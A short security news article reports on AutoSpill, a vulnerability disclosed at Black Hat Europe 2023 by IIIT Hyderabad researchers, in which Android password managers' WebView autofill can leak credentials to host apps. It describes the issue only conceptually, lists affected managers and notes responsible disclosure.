Researchers from the International Institute of Information Technology (IIIT) Hyderabad revealed a newly discovered attack, AutoSpill, during a presentation at the Black Hat Europe 2023 conference.
AutoSpill targets popular Android password managers, potentially exposing usernames and passwords.
The attack takes advantage of Android’s WebView framework, commonly utilized by services like Microsoft, Google, and Apple, to open web pages within apps, allowing users to log in quickly without using the main browser.
Android password managers also leverage the WebView framework to input account credentials on login pages automatically.
AutoSpill exploits this process when an app prompts users to log in using WebView, enabling the interception and theft of usernames and passwords.
The researchers attribute this vulnerability to the lack of clear guidelines in Android regarding the handling of autofill data, providing an avenue for threat actors to acquire sensitive information discreetly.
The study conducted tests on Android 10, 11, and 12 devices, revealing vulnerabilities in popular password managers like 1Password, Keeper, Enpass, Keepass2Android, and LastPass without requiring JavaScript injection.
However, Google Smart Lock and DashLane proved immune to AutoSpill because they used a different mechanism. Nevertheless, all mentioned password managers could be exploited if JavaScript injection is employed.
The researchers responsibly shared their findings with the Android security team and password manager developers, and both parties acknowledged the validity of the discovered vulnerabilities. This collaboration aims to address and rectify the identified issues to enhance the security of Android password managers.
